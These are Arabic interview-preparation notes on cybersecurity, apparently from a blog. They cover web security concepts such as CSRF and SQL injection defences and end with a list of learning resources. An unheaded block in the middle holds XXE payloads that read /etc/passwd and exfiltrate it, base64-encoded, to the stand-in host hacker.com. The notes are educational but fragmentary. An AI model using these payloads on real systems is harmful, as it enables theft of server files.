
ملخص لأسئلة مقابلات الأمن السيبراني التي مررت بها، آمل أن يساعدك هذا
هذه الصفحة هي ملخص للمقابلات التي مررت بها، وقد غطّت نطاقًا جيدًا من الأدوار، وتلقيت رفضات متعددة، لكنني تعلمت من كل مقابلة، وجمعت ملاحظات بنّاءة ومضيت قدمًا. آمل أن تساعدك هذه الأسئلة/النصائح.
الأدوار التي يغطيها بشكل عام هي كما يلي:
نصيحة سريعة:
لقد حاولت تدوين جميع الأسئلة المحتملة أدناه التي صادفتها وقدمت إجابات للبعض. أما الباقي فيمكنك البحث عنه في جوجل للحصول على إجابات محددة إذا أردت التعمق. بالإضافة إلى ذلك، هناك بعض المراجع في النهاية، ألقِ نظرة عليها. لقد كانت مفيدة حقًا.
سأحب إضافة المزيد من الأسئلة كلما تقدمت وراجعت ملاحظاتي، ومع ذلك سأقدّر لو قدمت لي ملاحظات بنّاءة حول هذا الموضوع بالتواصل معي عبر [email protected]. إذا صادفت شيئًا غير مغطى هنا، فلا تتردد في مشاركته.
ما هي CIA؟
ما هي AAA؟
OWASP Top 10
ما هو XSS (البرمجة النصية عبر المواقع)؟
ما هو CSRF
هذا هو السؤال الأجمل الذي يحب كل محاور أن يسأله
نصيحة سريعة: كن موجزًا، وإذا طُلب منك فقط اشرح القصة كاملة
تزوير الطلب عبر المواقع (CSRF) هو هجوم يجبر المستخدم النهائي على تنفيذ إجراءات غير مرغوب فيها في تطبيق ويب يكون مصادقًا عليه حاليًا. تستهدف هجمات CSRF تحديدًا الطلبات المغيِّرة للحالة، وليس سرقة البيانات، لأن المهاجم لا يمكنه رؤية الاستجابة للطلب المزور. بمساعدة بسيطة من الهندسة الاجتماعية (مثل إرسال رابط عبر البريد الإلكتروني أو الدردشة)، قد يخدع المهاجم مستخدمي تطبيق الويب لتنفيذ إجراءات يختارها المهاجم. إذا كانت الضحية مستخدمًا عاديًا، يمكن لهجوم CSRF ناجح أن يجبر المستخدم على تنفيذ طلبات تغيير الحالة مثل تحويل الأموال، تغيير عنوان بريده الإلكتروني، وما إلى ذلك. إذا كانت الضحية حسابًا إداريًا، يمكن أن يعرض CSRF تطبيق الويب بالكامل للخطر.
كيفية مكافحة CSRF:
استخدام رموز مكافحة CSRF
استخدام سياسة نفس الأصل
استخدام ترويسة Referrer
ما هو ترميز HTML/URL
هل بروتوكول HTTP عديم الحالة؟
HTTP بروتوكول عديم الحالة بطبيعته لكن الخادم يستخدم ملفات تعريف الارتباط لجعله ذو حالة
ما هي أنواع الحقن: SQL، الأوامر، نظام التشغيل
كيفية مكافحة حقن SQL
استخدام الاستعلامات المعلمة والإجراءات المخزنة
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
ليتم حقنه: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
مضيف خارجي: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
سأتحدث بشكل عام عن AWS، ومع ذلك هناك مزودو سحابة آخرون مثل Azure وGCP وDigital Ocean وغيرهم..
الموارد التعليمية:
https://regexone.com/ (التعبيرات النمطية ضرورية!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
أسئلة مقابلات أمن المعلومات:
https://danielmiessler.com/study/infosec_interview_questions
أهم أسئلة اختبار الاختراق:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
نصائح Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
دليل مستخدم AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
نظرة إلى SMB وSamba:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/